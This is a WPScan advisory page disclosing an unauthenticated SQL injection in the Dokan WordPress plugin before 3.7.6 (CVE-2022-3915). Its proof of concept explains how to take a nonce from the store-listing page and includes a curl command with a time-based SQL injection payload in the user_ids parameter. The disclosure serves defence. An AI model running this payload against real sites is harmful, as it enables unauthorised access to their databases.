WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Dokan < 3.7.6 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

Setup:

- Install WooCommerce (dependency, no setup required)
- Install the plugin, complete the wizard (no special configuration was performed - all defaults were accepted)

Attack:

- As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" from the source
- Invoke the following curl command (with the extracted nonce in place) to induce a five second sleep:

time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"

Affects Plugins

dokan-lite
Fixed in version 3.7.6

References

CVE
CVE-2022-3915

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
fd416d99-1970-418f-81f5-8438490d4479

Timeline

Publicly Published

2022-11-21 (about 10 months ago)

Added

2022-11-21 (about 10 months ago)

Last Updated

2022-11-21 (about 10 months ago)

Our Other Services

WPScan WordPress Security Plugin